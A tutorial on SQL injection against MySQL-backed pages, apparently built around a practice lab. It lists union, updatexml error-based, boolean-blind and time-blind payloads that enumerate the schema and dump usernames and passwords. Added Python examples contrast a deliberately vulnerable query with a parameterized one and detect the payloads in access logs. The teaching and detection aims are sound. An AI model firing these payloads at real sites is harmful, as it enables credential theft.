SQL Injection - 1
UNION-based injection
1. Check whether an injection point exists
id=1'                error
id=1' and 1=1%23     normal
id=1' and 1=2%23     error
This indicates a single-quote string-type SQL injection.
If all three produce errors, try the numeric, double-quote, and parenthesis variants instead.
2. Find the number of columns
id=1 order by 4%23   normal
id=1 order by 5%23   error
So the query has 4 columns.
Format: id=1 order by <number>%23 (%23 is the URL-encoded #, which comments out the rest of the original query)
3. Find the display positions
id=1 and 1=2 union select 1,2,3,4%23   (list as many numbers as there are columns)
Then look at which of 1,2,3,4 is reflected on the page.
4. Find the database name
Take the position that was reflected and replace that number with database(); the page will then show the database name in that position.
For example, if the 2 was reflected, replace the 2:
id=1 and 1=2 union select 1,database(),3,4%23
The database name is displayed in that position.
5. Find the table names (数据库名 below is a placeholder for the database name found in step 4)
id=1 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='数据库名'%23
This returns the names of all tables in that database.
Changing (table_name) to (0x23,table_name) separates the table names with # (0x23 is the ASCII code of #).
6. Find the column names (表名 is a placeholder for a table name found in step 5)
id=1 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='数据库名' and table_name='表名'%23
7. Dump the field contents (需列 is a placeholder for the wanted column)
id=2 union select 1,2,group_concat(需列,0x23,需列),4 from 数据库名.表名%23
This dumps the wanted usernames and passwords.
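Steps 1 and 3 to 7 above only work because the application splices the id parameter into the SQL text. The following Python/sqlite3 program is an added example, not code from the original notes: it places a vulnerable lookup beside a parameterized one and feeds both the step-1 probes and a union payload of the kind shown above, so the difference can be seen directly. The table names, rows, and function names are constructed for the example; sqlite's line comment is "-- " rather than MySQL's # (%23), so the payloads end with that.

```python
import sqlite3

# Constructed sample schema and rows for the example (not from the notes):
# an "articles" table the page is meant to read and a "users" table that the
# union payload reaches through the same query.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT)")
    conn.execute("INSERT INTO articles VALUES (1, 'hello')")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def lookup_vulnerable(conn, raw_id):
    # The id is spliced into the SQL text inside single quotes, so a quote in the
    # input closes the literal and everything after it is parsed as SQL: this is
    # the single-quote string-type injection that step 1 of the notes detects.
    sql = f"SELECT id, title FROM articles WHERE id='{raw_id}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, raw_id):
    # Parameterized query: the value travels separately from the statement text,
    # so quotes, AND, UNION or a comment marker in it are just characters of a value.
    return conn.execute("SELECT id, title FROM articles WHERE id=?", (raw_id,)).fetchall()

def parse_id(raw_id):
    # Defence in depth for a numeric id: reject anything that is not a plain
    # non-negative integer before it goes anywhere near the database.
    if not raw_id.isdigit():
        raise ValueError(f"invalid id: {raw_id!r}")
    return int(raw_id)

# The step-1 probes and a union payload from the notes, adapted to sqlite's "-- "
# line comment (MySQL uses # / %23). The union selects two columns because the
# original query returns two (step 2 of the notes finds this with ORDER BY).
PROBE_TRUE  = "1' and 1=1-- "
PROBE_FALSE = "1' and 1=2-- "
UNION_DUMP  = "1' and 1=2 union select username,password from users-- "

if __name__ == "__main__":
    db = build_db()
    for payload in (PROBE_TRUE, PROBE_FALSE, UNION_DUMP):
        print("vulnerable:", lookup_vulnerable(db, payload))
        print("safe      :", lookup_safe(db, payload))
    print("parse_id('1') =", parse_id("1"))
```

With the vulnerable function the two probes give different results (a row versus nothing), which is exactly the signal step 1 looks for, and the union payload returns the users table; with the parameterized function both probes and the union payload return nothing, because the whole string is compared against the id column as a value. parse_id shows the additional allowlist check that should sit in front of the query for an id that is supposed to be numeric.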
XPath (error-based) method
updatexml() raises an XPath syntax error whose message echoes the value passed to it, so the result is read from the database error text that the page displays.
Database name
?id=1' and updatexml(1,concat(0x23,database()),1) %23
Table names
?id=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='库名')),1) %23
Column names
?id=1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='库名' and table_name='表名')),1) %23
Field contents
?id=1' and updatexml(1,concat(0x23,(select group_concat(列名,0x23,列名) from 库名.表名)),1) %23
Boolean-based blind injection
Each request asks a true/false question: the page renders normally when the condition holds and behaves like id=1 and 1=2 otherwise.
1. Find the length of the database name
?id=1' and length(database())=8 %23
2. Find the ASCII value of each character of the database name
?id=1' and ascii(substr(database(),1,1))=115 %23
3. Find the number of tables
id=1' and (select count(table_name) from information_schema.tables where table_schema='数据库名')=4 %23
4. Find the ASCII values of the table names
First character of the table name:
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='数据库名' limit 0,1),1,1))=101 %23
Second character of the table name:
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='数据库名' limit 0,1),2,1))=101 %23
...
5. Find the number of columns
id=1' and (select count(column_name) from information_schema.columns where table_schema='数据库名' and table_name='表名')=3 %23
6. Find the ASCII values of the column names
First character of the column name:
id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 %23
Second character of the column name:
id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),2,1))=105 %23
...
7. Find the number of records
id=1' and (select count(列名) from 数据库名.表名)=13 %23
8. Dump the field contents
First character of the field:
id=1' and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23
Second character of the field:
id=1' and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),2,1))=68 %23
Time-based blind injection
Same questions as in the boolean-based section, but the answer is read from the response time: if(...) calls sleep(3) when the condition is true and returns 1 immediately otherwise.
1. Find the length of the database name
?id=1' and if(length(database())=8,sleep(3),1) %23
2. Find the ASCII value of each character of the database name
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) %23
3. Find the number of tables
id=1' and if((select count(table_name) from information_schema.tables where table_schema='数据库名')=4,sleep(3),1) %23
4. Find the ASCII values of the table names
First character of the table name:
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='数据库名' limit 0,1),1,1))=101,sleep(3),1) %23
Second character of the table name:
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='数据库名' limit 0,1),2,1))=101,sleep(3),1) %23
...
5. Find the number of columns
id=1' and if((select count(column_name) from information_schema.columns where table_schema='数据库名' and table_name='表名')=3,sleep(3),1) %23
6. Find the ASCII values of the column names
First character of the column name:
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(3),1) %23
Second character of the column name:
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),2,1))=105,sleep(3),1) %23
...
7. Find the number of records
id=1' and if((select count(列名) from 数据库名.表名)=13,sleep(3),1) %23
8. Dump the field contents
First character of the field:
id=1' and if(ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68,sleep(3),1) %23
Second character of the field:
id=1' and if(ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),2,1))=68,sleep(3),1) %23
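From the defender's side, every technique in these notes (the union, updatexml, boolean ascii/substr and sleep payloads) leaves a recognisable pattern in the web server's access log once the query string is percent-decoded, and the boolean and time-based variants additionally show up as one client sending long runs of near-identical requests. The following Python script is an added example, not part of the original notes: it decodes the query string, matches it against a handful of keyword rules, aggregates hits per client, and corroborates sleep() payloads with the response-time column. The log format, IP addresses, and log lines are constructed for the example; a real deployment would parse the web server's actual log layout.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the notes): client IP, request line,
# status code, response time in milliseconds. One client replays the probes
# from the notes; two others make ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 "GET /article.php?id=1 HTTP/1.1" 200 12
10.0.0.9 "GET /article.php?id=1%27+and+1%3D1%23 HTTP/1.1" 200 11
10.0.0.9 "GET /article.php?id=1%27+and+1%3D2%23 HTTP/1.1" 200 10
10.0.0.9 "GET /article.php?id=1+and+1%3D2+union+select+1%2Cdatabase%28%29%2C3%2C4%23 HTTP/1.1" 200 13
10.0.0.9 "GET /article.php?id=1%27+and+updatexml%281%2Cconcat%280x23%2Cdatabase%28%29%29%2C1%29+%23 HTTP/1.1" 500 9
10.0.0.9 "GET /article.php?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D115+%23 HTTP/1.1" 200 10
10.0.0.9 "GET /article.php?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D116+%23 HTTP/1.1" 200 11
10.0.0.9 "GET /article.php?id=1%27+and+if%28length%28database%28%29%29%3D8%2Csleep%283%29%2C1%29+%23 HTTP/1.1" 200 3012
10.0.0.7 "GET /article.php?id=42 HTTP/1.1" 200 15
"""

# Assumed log layout for the constructed lines above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "GET (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d+) (?P<ms>\d+)$')

# Keyword rules, one per technique in the notes. They run on the decoded,
# lowercased query string, i.e. on the text the database would actually see.
RULES = {
    "tautology":     re.compile(r"\band\s+1\s*=\s*[12]\b"),                   # step-1 probes
    "union_select":  re.compile(r"\bunion\b.*?\bselect\b"),                    # union-based
    "error_based":   re.compile(r"\b(updatexml|extractvalue)\s*\("),           # XPath method
    "schema_enum":   re.compile(r"\binformation_schema\."),                    # table/column enumeration
    "boolean_probe": re.compile(r"\b(ascii|length)\s*\(\s*(substr|database)"), # blind character tests
    "time_based":    re.compile(r"\b(sleep|benchmark)\s*\("),                  # time-based blind
}

def decode_query(path):
    # Decode percent-encoding once (%23 -> '#', %27 -> quote) and lowercase;
    # matching on the raw URL would miss every payload in the notes.
    _, _, query = path.partition("?")
    return unquote_plus(query).lower()

def classify(query):
    # Names of all rules that fire on one decoded query string.
    return [name for name, rx in RULES.items() if rx.search(query)]

def analyze(log_text, slow_ms=2500):
    # Returns (per-client rule counters, list of corroborated time-based hits).
    per_client = defaultdict(Counter)
    slow = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(decode_query(m["path"]))
        if hits:
            per_client[m["ip"]].update(hits)
        # A sleep() payload whose response really took about 3 s is strong
        # evidence that the condition evaluated inside the database.
        if "time_based" in hits and int(m["ms"]) >= slow_ms:
            slow.append((m["ip"], int(m["ms"])))
    return dict(per_client), slow

if __name__ == "__main__":
    findings, slow = analyze(SAMPLE_LOG)
    for ip, counter in findings.items():
        print(ip, dict(counter))
    print("corroborated time-based probes:", slow)
```

The per-client counters are the useful output: a single tautology hit can be a false positive, but one address producing tautology, union, updatexml and a run of ascii(substr(...)) comparisons within the same session is the enumeration sequence this page describes, and the slow-response check turns a sleep() keyword match into evidence that the injected condition actually ran.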